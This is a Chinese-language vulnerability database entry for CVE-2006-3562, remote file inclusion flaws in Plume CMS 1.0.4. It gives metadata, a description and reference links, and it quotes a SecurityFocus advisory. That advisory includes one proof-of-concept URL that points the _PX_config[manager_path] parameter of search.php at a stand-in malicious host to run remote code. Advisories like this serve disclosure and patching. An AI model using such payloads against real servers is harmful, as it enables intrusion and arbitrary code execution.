Plume CMS多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110556 漏洞类型 代码注入
发布时间 2006-07-03 更新时间 2006-07-18
CVE编号 CVE-2006-3562 CNNVD-ID CNNVD-200607-200
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28149
https://cxsecurity.com/issue/WLB-2006070071
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-200
|漏洞详情
plumecms1.0.4存在PHP远程文件包含漏洞。远程攻击者可以借助对(1)index.php,(2)rss.php或(3)search.php的_PX_config[manager_path]参数中的URL,执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/18780/info
  
Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
  
A successful exploit of these issues allows the attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
  
http://www.example.com/(path)/search.php?_PX_config[manager_path]=http://evilcode.txt?
|参考资料

来源:XF
名称:plumecms-multiple-scripts-file-include(27530)
链接:http://xforce.iss.net/xforce/xfdb/27530
来源:BID
名称:18780
链接:http://www.securityfocus.com/bid/18780
来源:BUGTRAQ
名称:20060702plume-cmsv1.0.4MultipleRemoteFileinclude
链接:http://www.securityfocus.com/archive/1/archive/1/438948/100/100/threaded
来源:SECTRACK
名称:1016426
链接:http://securitytracker.com/id?1016426
来源:SREASON
名称:1220
链接:http://securityreason.com/securityalert/1220